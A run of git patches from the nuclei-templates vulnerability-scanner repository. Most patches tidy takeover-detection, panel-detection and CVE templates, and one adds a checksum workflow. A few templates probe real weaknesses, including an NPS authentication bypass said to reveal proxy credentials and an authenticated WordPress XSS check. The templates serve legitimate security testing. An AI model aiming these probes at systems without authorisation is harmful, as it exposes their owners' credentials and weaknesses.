a/takeovers/pantheon-takeover.yaml b/takeovers/pantheon-takeover.yaml index 31d6e35ddf..41dfc588e4 100644 --- a/takeovers/pantheon-takeover.yaml +++ b/takeovers/pantheon-takeover.yaml @@ -1,7 +1,7 @@ id: pantheon-takeover info: - name: pantheon takeover detection + name: Pantheon Takeover Detection author: pdteam severity: high reference: From 6236fbb74d40335773be8993a66f2977e5148186 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 7 Dec 2022 09:54:06 +0530 Subject: [PATCH 0183/1133] Update smartjob-takeover.yaml --- takeovers/smartjob-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/smartjob-takeover.yaml b/takeovers/smartjob-takeover.yaml index 5d9ba6a9e5..0ce0740f1a 100644 --- a/takeovers/smartjob-takeover.yaml +++ b/takeovers/smartjob-takeover.yaml @@ -1,7 +1,7 @@ id: smartjob-takeover info: - name: smartjob takeover detection + name: Smartjob Takeover Detection author: pdteam severity: high reference: From bed09e7faaa30de6a14b40ba0edbe519dba5fc46 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 7 Dec 2022 10:02:16 +0530 Subject: [PATCH 0186/1133] Update launchrock-takeover.yaml --- takeovers/launchrock-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/launchrock-takeover.yaml b/takeovers/launchrock-takeover.yaml index fe9129d337..9f6a8dcde7 100644 --- a/takeovers/launchrock-takeover.yaml +++ b/takeovers/launchrock-takeover.yaml @@ -1,7 +1,7 @@ id: launchrock-takeover info: - name: launchrock takeover detection + name: Launchrock Takeover Detection author: pdteam severity: high reference: From aee66dcb7d8fe65b6a6f4463b69b6e482424d1a4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 7 Dec 2022 10:08:47 +0530 Subject: [PATCH 0189/1133] Update canny-takeover.yaml --- takeovers/canny-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/canny-takeover.yaml b/takeovers/canny-takeover.yaml index c170a8e51d..79d217c135 100644 --- a/takeovers/canny-takeover.yaml +++ b/takeovers/canny-takeover.yaml @@ -1,7 +1,7 @@ id: canny-takeover info: - name: canny takeover detection + name: Canny Takeover Detection author: pdteam severity: high reference: From b12b0aa17a141d6236302ed0c24b71c1c12ab5b9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 10:34:49 +0530 Subject: [PATCH 0192/1133] Update jcms-panel.yaml --- exposed-panels/jcms-panel.yaml | 17 ++++++++--------- 1 file changed, 8 insertions(+), 9 deletions(-) diff --git a/exposed-panels/jcms-panel.yaml b/exposed-panels/jcms-panel.yaml index c8875742fd..32dfe38219 100644 --- a/exposed-panels/jcms-panel.yaml +++ b/exposed-panels/jcms-panel.yaml @@ -1,4 +1,4 @@ -id: jcms-panel +id: jalios-jcms-panel info: name: Jalios JCMS Panel @@ -8,26 +8,25 @@ info: - https://www.jalios.com/ metadata: verified: true - shodan-query: html:"/jcms/" - tags: panel,jcms + shodan-query: html:"Jalios JCMS" + tags: panel,jalios,jcms requests: - method: GET path: - - "{{BaseURL}}/jcms/front/privateLogin.jsp" + - "{{BaseURL}}" - "{{BaseURL}}/front/privateLogin.jsp" + host-redirects: true + max-redirects: 2 stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - - "Jalios JCMS" + - 'content="Jalios JCMS' + - 'jalios-login' - "JCMS_login" - "/jcms/" condition: or - - - type: status - status: - - 200 From fad2e4dda190a9a0d49fb2a094b3e1dbaf294685 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 7 Dec 2022 05:10:50 +0000 Subject: [PATCH 0193/1133] Auto Generated New Template Addition List [Wed Dec 7 05:10:50 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e69de29bb2..bfe37f8af2 100644 --- a/.new-additions +++ b/.new-additions @@ -0,0 +1 @@ +exposed-panels/jcms-panel.yaml From 9cfebe489b5ad7ba56235008996d030cafe54c38 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 7 Dec 2022 10:49:50 +0530 Subject: [PATCH 0194/1133] Update nps-auth-bypass.yaml --- vulnerabilities/nps/nps-auth-bypass.yaml | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/vulnerabilities/nps/nps-auth-bypass.yaml b/vulnerabilities/nps/nps-auth-bypass.yaml index 82ce8d4b82..53e9f76414 100644 --- a/vulnerabilities/nps/nps-auth-bypass.yaml +++ b/vulnerabilities/nps/nps-auth-bypass.yaml @@ -4,9 +4,13 @@ info: name: NPS Authentication Bypass author: SleepingBag945 severity: high - description: This will reveal all parameters configured on the NPS, including the account username and password of the proxy. + description: | + This will reveal all parameters configured on the NPS, including the account username and password of the proxy. reference: - https://mari0er.club/post/nps.html/ + metadata: + verified: true + shodan-query: html:"https://ehang.io/nps" tags: nps,auth-bypass requests: @@ -23,13 +27,12 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "rows" - "total" - part: body condition: and + - type: status status: - 200 - -# Enhanced by mp on 2022/04/12 From 948f05204cef9503ffad152896dbeb085f55ea5f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 7 Dec 2022 10:55:13 +0530 Subject: [PATCH 0195/1133] Update nps-auth-bypass.yaml --- vulnerabilities/nps/nps-auth-bypass.yaml | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/nps/nps-auth-bypass.yaml b/vulnerabilities/nps/nps-auth-bypass.yaml index 53e9f76414..628feb35ee 100644 --- a/vulnerabilities/nps/nps-auth-bypass.yaml +++ b/vulnerabilities/nps/nps-auth-bypass.yaml @@ -29,10 +29,15 @@ requests: - type: word part: body words: - - "rows" - - "total" + - "VerifyKey" + - "Password" condition: and + - type: word + part: header + words: + - "application/json" + - type: status status: - 200 From 9fd66166c65c3daea2da87e24cbc4c9ccd48408c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 7 Dec 2022 05:28:55 +0000 Subject: [PATCH 0196/1133] Auto Generated New Template Addition List [Wed Dec 7 05:28:55 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index bfe37f8af2..54d7352fa9 100644 --- a/.new-additions +++ b/.new-additions @@ -1 +1,2 @@ exposed-panels/jcms-panel.yaml +technologies/pypiserver-detect.yaml From 26671e050a19332db020b5f2af4bc5fe874ddf50 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 7 Dec 2022 11:31:39 +0530 Subject: [PATCH 0197/1133] Update CVE-2021-35380.yaml --- cves/2021/CVE-2021-35380.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-35380.yaml b/cves/2021/CVE-2021-35380.yaml index 499374080d..133aeff3dc 100644 --- a/cves/2021/CVE-2021-35380.yaml +++ b/cves/2021/CVE-2021-35380.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2021-35380 cwe-id: CWE-22 - tags: cve,cve2022,termtalk,lfi,unauth,lfr,edb + tags: cve,cve2021,termtalk,lfi,unauth,lfr,edb requests: - method: GET From 89dda36523831201207c13a74e6a0b9b9d797c3f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 7 Dec 2022 11:32:13 +0530 Subject: [PATCH 0199/1133] Update CVE-2020-24903.yaml --- cves/2020/CVE-2020-24903.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-24903.yaml b/cves/2020/CVE-2020-24903.yaml index f50b7c92c8..84a4b25ef1 100644 --- a/cves/2020/CVE-2020-24903.yaml +++ b/cves/2020/CVE-2020-24903.yaml @@ -17,7 +17,7 @@ info: metadata: shodan-query: http.component:"ASP.NET" verified: "true" - tags: cve,cve2022,cuteeditor,xss,seclists + tags: cve,cve2020,cuteeditor,xss,seclists requests: - method: GET From 691481a8f384fcdb9c3c47ecc5dbb2d3a56a4f29 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 7 Dec 2022 11:32:41 +0530 Subject: [PATCH 0201/1133] Update CVE-2020-14408.yaml --- cves/2020/CVE-2020-14408.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-14408.yaml b/cves/2020/CVE-2020-14408.yaml index 720c9bd013..8f848663db 100644 --- a/cves/2020/CVE-2020-14408.yaml +++ b/cves/2020/CVE-2020-14408.yaml @@ -15,7 +15,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-14408 metadata: verified: true - tags: cve,cve2022,cockpit,agentejo,xss,oss + tags: cve,cve2020,cockpit,agentejo,xss,oss requests: - method: GET From 59cb945a59e54e215b7d08055b0f057a517a85cb Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Wed, 7 Dec 2022 01:26:51 -0500 Subject: [PATCH 0203/1133] Update gemfury-takeover.yaml --- takeovers/gemfury-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/gemfury-takeover.yaml b/takeovers/gemfury-takeover.yaml index 5dccf7eaff..541aa04149 100644 --- a/takeovers/gemfury-takeover.yaml +++ b/takeovers/gemfury-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/154 tags: takeover requests: @@ -21,4 +21,4 @@ requests: - type: word words: - - "404: This page could not be found." \ No newline at end of file + - "404: This page could not be found." From 00e61f4c5ec378aa6e4dd25d80a3ae41ac3d5595 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Wed, 7 Dec 2022 02:50:56 -0500 Subject: [PATCH 0204/1133] Update strikingly-takeover.yaml --- takeovers/strikingly-takeover.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/takeovers/strikingly-takeover.yaml b/takeovers/strikingly-takeover.yaml index aa85db2068..aa9a0b7958 100644 --- a/takeovers/strikingly-takeover.yaml +++ b/takeovers/strikingly-takeover.yaml @@ -6,6 +6,7 @@ info: severity: high reference: - https://medium.com/@sherif0x00/takeover-subdomains-pointing-to-strikingly-5e67df80cdfd + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/58 tags: takeover requests: @@ -23,4 +24,4 @@ requests: words: - "But if you're looking to build your own website" - "you've come to the right place." - condition: and \ No newline at end of file + condition: and From b3f0c247324a35af578b28f5b8d8c5179c30c219 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Wed, 7 Dec 2022 02:55:26 -0500 Subject: [PATCH 0205/1133] Update teamwork-takeover.yaml No references --- takeovers/teamwork-takeover.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/takeovers/teamwork-takeover.yaml b/takeovers/teamwork-takeover.yaml index 90fef807fe..77035f590c 100644 --- a/takeovers/teamwork-takeover.yaml +++ b/takeovers/teamwork-takeover.yaml @@ -4,8 +4,6 @@ info: name: teamwork takeover detection author: pdteam severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover requests: @@ -21,4 +19,4 @@ requests: - type: word words: - - Oops - We didn't find your site. \ No newline at end of file + - Oops - We didn't find your site. From 07d268b4c82bd73343cfe2017cedff8bf1eaf8a3 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Wed, 7 Dec 2022 03:12:11 -0500 Subject: [PATCH 0206/1133] Update intercom-takeover.yaml --- takeovers/intercom-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/intercom-takeover.yaml b/takeovers/intercom-takeover.yaml index 355b8245cc..ace40a0a5d 100644 --- a/takeovers/intercom-takeover.yaml +++ b/takeovers/intercom-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/69 tags: takeover,intercom requests: From 80d9ad9fa334e150e62a6afef39ac26859504663 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 14:32:57 +0530 Subject: [PATCH 0207/1133] Update gemfury-takeover.yaml --- takeovers/gemfury-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/gemfury-takeover.yaml b/takeovers/gemfury-takeover.yaml index 541aa04149..840f7751e2 100644 --- a/takeovers/gemfury-takeover.yaml +++ b/takeovers/gemfury-takeover.yaml @@ -1,12 +1,12 @@ id: gemfury-takeover info: - name: gemfury takeover detection + name: Gemfury Takeover Detection author: pdteam severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/154 - tags: takeover + tags: takeover,gemfury requests: - method: GET From b33d40f936baa29bf377838ce37416533d5579cd Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 14:33:30 +0530 Subject: [PATCH 0208/1133] Update strikingly-takeover.yaml --- takeovers/strikingly-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/strikingly-takeover.yaml b/takeovers/strikingly-takeover.yaml index aa9a0b7958..a32ec9d7a8 100644 --- a/takeovers/strikingly-takeover.yaml +++ b/takeovers/strikingly-takeover.yaml @@ -1,13 +1,13 @@ id: strikingly-takeover info: - name: strikingly takeover detection + name: Strikingly Takeover Detection author: pdteam severity: high reference: - https://medium.com/@sherif0x00/takeover-subdomains-pointing-to-strikingly-5e67df80cdfd - https://github.com/EdOverflow/can-i-take-over-xyz/issues/58 - tags: takeover + tags: takeover,strikingly requests: - method: GET From c60c66f02f6d8890a9ab170bc33ffb5f8c3e333b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 7 Dec 2022 14:39:34 +0530 Subject: [PATCH 0209/1133] Rename CVE-2017-14186.yml to CVE-2017-14186.yaml --- cves/2017/{CVE-2017-14186.yml => CVE-2017-14186.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cves/2017/{CVE-2017-14186.yml => CVE-2017-14186.yaml} (100%) diff --git a/cves/2017/CVE-2017-14186.yml b/cves/2017/CVE-2017-14186.yaml similarity index 100% rename from cves/2017/CVE-2017-14186.yml rename to cves/2017/CVE-2017-14186.yaml From 7973d4bf3207f461d39a85342905f5b212282d85 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 7 Dec 2022 14:39:58 +0530 Subject: [PATCH 0211/1133] Rename ruckus-wireless-admin-login to ruckus-wireless-admin-login.yaml --- ...ckus-wireless-admin-login => ruckus-wireless-admin-login.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename exposed-panels/{ruckus-wireless-admin-login => ruckus-wireless-admin-login.yaml} (100%) diff --git a/exposed-panels/ruckus-wireless-admin-login b/exposed-panels/ruckus-wireless-admin-login.yaml similarity index 100% rename from exposed-panels/ruckus-wireless-admin-login rename to exposed-panels/ruckus-wireless-admin-login.yaml From ddbaa910eb3e0bedbf85078bc9fa2e28368d9dbe Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 7 Dec 2022 14:40:21 +0530 Subject: [PATCH 0213/1133] Rename influxdb-version-detect to influxdb-version-detect.yaml --- .../{influxdb-version-detect => influxdb-version-detect.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{influxdb-version-detect => influxdb-version-detect.yaml} (100%) diff --git a/technologies/influxdb-version-detect b/technologies/influxdb-version-detect.yaml similarity index 100% rename from technologies/influxdb-version-detect rename to technologies/influxdb-version-detect.yaml From f1e3b17e537dd90e273234ac67ee0e8049499477 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 7 Dec 2022 14:40:41 +0530 Subject: [PATCH 0214/1133] Rename versa-analytics-server to versa-analytics-server.yaml --- .../versa/{versa-analytics-server => versa-analytics-server.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/versa/{versa-analytics-server => versa-analytics-server.yaml} (100%) diff --git a/technologies/versa/versa-analytics-server b/technologies/versa/versa-analytics-server.yaml similarity index 100% rename from technologies/versa/versa-analytics-server rename to technologies/versa/versa-analytics-server.yaml From 4500d5e374153e838ef52e8809f94b3837a403b5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 7 Dec 2022 14:41:03 +0530 Subject: [PATCH 0217/1133] Rename wp-related-post-xss to wp-related-post-xss.yaml --- .../wordpress/{wp-related-post-xss => wp-related-post-xss.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename vulnerabilities/wordpress/{wp-related-post-xss => wp-related-post-xss.yaml} (100%) diff --git a/vulnerabilities/wordpress/wp-related-post-xss b/vulnerabilities/wordpress/wp-related-post-xss.yaml similarity index 100% rename from vulnerabilities/wordpress/wp-related-post-xss rename to vulnerabilities/wordpress/wp-related-post-xss.yaml From 5a7ebc0c7ee06382b32bc9342e85e49cf3f2f860 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 7 Dec 2022 14:45:54 +0530 Subject: [PATCH 0219/1133] Update intercom-takeover.yaml --- takeovers/intercom-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/intercom-takeover.yaml b/takeovers/intercom-takeover.yaml index ace40a0a5d..893073e771 100644 --- a/takeovers/intercom-takeover.yaml +++ b/takeovers/intercom-takeover.yaml @@ -1,7 +1,7 @@ id: intercom-takeover info: - name: intercom takeover detection + name: Intercom Takeover Detection author: pdteam severity: high reference: From 94637439f2b165187d914747f9ed1fce43ed9c8f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 14:49:27 +0530 Subject: [PATCH 0223/1133] Update teamwork-takeover.yaml --- takeovers/teamwork-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/teamwork-takeover.yaml b/takeovers/teamwork-takeover.yaml index 77035f590c..2ed7b0fcbb 100644 --- a/takeovers/teamwork-takeover.yaml +++ b/takeovers/teamwork-takeover.yaml @@ -1,10 +1,10 @@ id: teamwork-takeover info: - name: teamwork takeover detection + name: Teamwork Takeover Detection author: pdteam severity: high - tags: takeover + tags: takeover,teamwork requests: - method: GET From 08b05044930b8b43276b770d2c958373171d3f63 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 7 Dec 2022 14:51:51 +0530 Subject: [PATCH 0227/1133] Update teamwork-takeover.yaml --- takeovers/teamwork-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/teamwork-takeover.yaml b/takeovers/teamwork-takeover.yaml index 2ed7b0fcbb..ca50282075 100644 --- a/takeovers/teamwork-takeover.yaml +++ b/takeovers/teamwork-takeover.yaml @@ -19,4 +19,4 @@ requests: - type: word words: - - Oops - We didn't find your site. + - "Oops - We didn't find your site." From b48c05dc27c8db27ee85973c7b79c29de34e2a71 Mon Sep 17 00:00:00 2001 From: Sandeep Singh <sandeep@projectdiscovery.io> Date: Wed, 7 Dec 2022 14:54:33 +0530 Subject: [PATCH 0228/1133] Added Template Checksum generator (#6283) * Added Template Checksum generator * fixed lint errors --- .github/workflows/template-checksum.yml | 37 +++++++++++++++++++ technologies/influxdb-version-detect.yaml | 4 +- .../wordpress/wp-related-post-xss.yaml | 4 +- 3 files changed, 41 insertions(+), 4 deletions(-) create mode 100644 .github/workflows/template-checksum.yml diff --git a/.github/workflows/template-checksum.yml b/.github/workflows/template-checksum.yml new file mode 100644 index 0000000000..9f2945613f --- /dev/null +++ b/.github/workflows/template-checksum.yml @@ -0,0 +1,37 @@ +name: 📝 Template Checksum + +on: + push: + tags: + - '*' + workflow_dispatch: + +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@master + - uses: actions/setup-go@v2 + with: + go-version: 1.18 + + - name: install checksum generator + run: | + go install -v github.com/projectdiscovery/nuclei/v2/cmd/generate-checksum@dev + + - name: generate checksum + run: | + generate-checksum /home/runner/work/nuclei-templates/nuclei-templates/ templates-checksum.txt + + - name: Commit files + run: | + git add templates-checksum.txt + git config --local user.email "action@github.com" + git config --local user.name "GitHub Action" + git commit -m "Auto Generated Templates Checksum [$(date)] :robot:" -a + + - name: Push changes + uses: ad-m/github-push-action@master + with: + github_token: ${{ secrets.GITHUB_TOKEN }} + branch: master \ No newline at end of file diff --git a/technologies/influxdb-version-detect.yaml b/technologies/influxdb-version-detect.yaml index 6cb22994e6..1d9954b637 100644 --- a/technologies/influxdb-version-detect.yaml +++ b/technologies/influxdb-version-detect.yaml @@ -6,8 +6,8 @@ info: severity: info description: Obtain InfluxDB Version Information reference: - - https://docs.influxdata.com/influxdb/v1.8/tools/api/#ping-http-endpoint - - https://github.com/influxdata/influxdb/blob/master/http/platform_handler.go#L62 + - https://docs.influxdata.com/influxdb/v1.8/tools/api/#ping-http-endpoint + - https://github.com/influxdata/influxdb/blob/master/http/platform_handler.go#L62 metadata: verified: true shodan-query: "X-Influxdb-" diff --git a/vulnerabilities/wordpress/wp-related-post-xss.yaml b/vulnerabilities/wordpress/wp-related-post-xss.yaml index 3cacb9b6ee..a254d86a6f 100644 --- a/vulnerabilities/wordpress/wp-related-post-xss.yaml +++ b/vulnerabilities/wordpress/wp-related-post-xss.yaml @@ -14,12 +14,12 @@ info: tags: wordpress,wp,wp-plugin,xss,relatedposts,authenticated requests: - - raw: + - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - + log={{username}}&pwd={{password}}&wp-submit=Log+In - | From a5ff916f054e0316f6e674f6389e6a4622b0a665 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 7 Dec 2022 09:25:25 +0000 Subject: [PATCH 0230/1133] Auto Generated CVE annotations [Wed Dec 7 09:25:25 UTC 2022] :robot: --- cves/2017/CVE-2017-14186.yaml | 36 +++++++++++++++++++---------------- 1 file changed, 20 insertions(+), 16 deletions(-) diff --git a/cves/2017/CVE-2017-14186.yaml b/cves/2017/CVE-2017-14186.yaml index 8c78fad2de..801101d0e5 100644 --- a/cves/2017/CVE-2017-14186.yaml +++ b/cves/2017/CVE-2017-14186.yaml @@ -1,21 +1,25 @@ id: CVE-2017-14186 -info: - name: FortiGate SSL VPN Web Portal - Cross Site Scripting - author: johnk3r - severity: medium - description: | - Failure to sanitize the login redir parameter in the SSL-VPN web portal may allow an attacker to perform a Cross-site Scripting (XSS) or an URL Redirection attack. - reference: - - https://www.fortiguard.com/psirt/FG-IR-17-242 - - https://nvd.nist.gov/vuln/detail/CVE-2017-14186 - classification: - cve-id: CVE-2017-14186 - metadata: - verified: true - shodan-query: port:10443 http.favicon.hash:945408572 - tags: cve,cve2017,fortigate,xss,fortinet - +info: + name: FortiGate SSL VPN Web Portal - Cross Site Scripting + author: johnk3r + severity: medium + description: | + Failure to sanitize the login redir parameter in the SSL-VPN web portal may allow an attacker to perform a Cross-site Scripting (XSS) or an URL Redirection attack. + reference: + - https://www.fortiguard.com/psirt/FG-IR-17-242 + - https://nvd.nist.gov/vuln/detail/CVE-2017-14186 + - https://fortiguard.com/advisory/FG-IR-17-242 + - http://www.securitytracker.com/id/1039891 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2017-14186 + cwe-id: CWE-79 + metadata: + shodan-query: port:10443 http.favicon.hash:945408572 + verified: "true" + tags: cve,cve2017,fortigate,xss,fortinet requests: - method: GET path: From aa8ce7f31cf5e78d245d119c5f8aeb47df376840 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 7 Dec 2022 14:56:54 +0530 Subject: [PATCH 0231/1133] adding git pull before merge --- .github/workflows/template-checksum.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/template-checksum.yml b/.github/workflows/template-checksum.yml index 9f2945613f..95b0e29d0d 100644 --- a/.github/workflows/template-checksum.yml +++ b/.github/workflows/template-checksum.yml @@ -25,6 +25,7 @@ jobs: - name: Commit files run: | + git pull git add templates-checksum.txt git config --local user.email "action@github.com" git config --local user.name "GitHub Action" From d03f51d94239df61e734b73eb068584fe9c80caf Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 7 Dec 2022 09:27:27 +0000 Subject: [PATCH 0233/1133] Auto Generated Templates Checksum [Wed Dec 7 09:27:27 UTC 2022] :robot: --- templates-checksum.txt | 4786 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 4786 insertions(+) create mode 100644 templates-checksum.txt diff --git a/templates-checksum.txt b/templates-checksum.txt new file mode 100644 index 0000000000..9266be6a54 --- /dev/null +++ b/templates-checksum.txt @@ -0,0 +1,4786 @@ +nuclei-templates/.git/FETCH_HEAD:030b98fe8404e6107e74b2e7e96c73c4e2ede662 +nuclei-templates/.git/HEAD:acbaef275e46a7f14c1ef456fff2c8bbe8c84724 +nuclei-templates/.git/config:86dcbb528793abff8e2266821fd68f79cbe714ce +nuclei-templates/.git/description:9635f1b7e12c045212819dd934d809ef07efa2f4 +nuclei-templates/.git/hooks/applypatch-msg.sample:4de88eb95a5e93fd27e78b5fb3b5231a8d8917dd +nuclei-templates/.git/hooks/commit-msg.sample:ee1ed5aad98a435f2020b6de35c173b75d9affac +nuclei-templates/.git/hooks/fsmonitor-watchman.sample:0ec0ec9ac11111433d17ea79e0ae8cec650dcfa4 +nuclei-templates/.git/hooks/post-update.sample:b614c2f63da7dca9f1db2e7ade61ef30448fc96c +nuclei-templates/.git/hooks/pre-applypatch.sample:f208287c1a92525de9f5462e905a9d31de1e2d75 +nuclei-templates/.git/hooks/pre-commit.sample:a79d057388ee2c2fe6561d7697f1f5efcff96f23 +nuclei-templates/.git/hooks/pre-merge-commit.sample:04c64e58bc25c149482ed45dbd79e40effb89eb7 +nuclei-templates/.git/hooks/pre-push.sample:a599b773b930ca83dbc3a5c7c13059ac4a6eaedc +nuclei-templates/.git/hooks/pre-rebase.sample:288efdc0027db4cfd8b7c47c4aeddba09b6ded12 +nuclei-templates/.git/hooks/pre-receive.sample:705a17d259e7896f0082fe2e9f2c0c3b127be5ac +nuclei-templates/.git/hooks/prepare-commit-msg.sample:2584806ba147152ae005cb675aa4f01d5d068456 +nuclei-templates/.git/hooks/push-to-checkout.sample:508240328c8b55f8157c93c43bf5e291e5d2fbcb +nuclei-templates/.git/hooks/update.sample:730e6bd5225478bab6147b7a62a6e2ae21d40507 +nuclei-templates/.git/index:73481c91a99b43332150a192c42a0df3b69f1a16 +nuclei-templates/.git/info/exclude:c879df015d97615050afa7b9641e3352a1e701ac +nuclei-templates/.git/logs/HEAD:96af7d0a5f36cd6251a793dd555157938c5d7aac +nuclei-templates/.git/logs/refs/heads/master:ef53f9ea90198d3dc6a333e0b210657916b371a5 +nuclei-templates/.git/logs/refs/remotes/origin/master:cb4e2156c5c8973b490763174c03c0174da05f75 +nuclei-templates/.git/objects/pack/pack-ba759db8ed0458b208aab81f54616f27dbbd9558.idx:47112dc2a3a790b796d0027282d26e3b8882fb98 +nuclei-templates/.git/objects/pack/pack-ba759db8ed0458b208aab81f54616f27dbbd9558.pack:7d9f09c0bf3a0c028ec335926cc6e0a99ca864fc +nuclei-templates/.git/refs/heads/master:552a97225cba295738b68e27504ebc78d625b801 +nuclei-templates/.git/refs/remotes/origin/master:552a97225cba295738b68e27504ebc78d625b801 +nuclei-templates/.git/shallow:552a97225cba295738b68e27504ebc78d625b801 +nuclei-templates/.github/ISSUE_TEMPLATE/config.yml:36528063de7a90c778cf7659ba1602192633b79b +nuclei-templates/.github/ISSUE_TEMPLATE/false-negative.md:0e65476d94206488d9442d7971fad43a8caae368 +nuclei-templates/.github/ISSUE_TEMPLATE/false-positive.md:3db9beeaf3e3b80e75c61fe2861b793178e86acf +nuclei-templates/.github/ISSUE_TEMPLATE/feature_request.md:ddd6450369c1b6d242a610c8636cc582b36699ee +nuclei-templates/.github/ISSUE_TEMPLATE/issue-report.md:f872a1ca466132968cd8d19e7bd676290bbd633d +nuclei-templates/.github/ISSUE_TEMPLATE/new-template.md:ad3de4c90856fe9e6f6c381de149067bbc894125 +nuclei-templates/.github/ISSUE_TEMPLATE/submit-template.md:03c4b734a880dacb2908bdfa429ba7a1c618fe92 +nuclei-templates/.github/scripts/README.tmpl:9d35c46556d8d2cd93f9f3d68ec0ce9ee1fea5cb +nuclei-templates/.github/scripts/update-readme.py:844675b031152273838486355350bb78a432d6ab +nuclei-templates/.github/workflows/cache-purge.yml:3310fb2649196c8338ba460aec6d7817f751a3a3 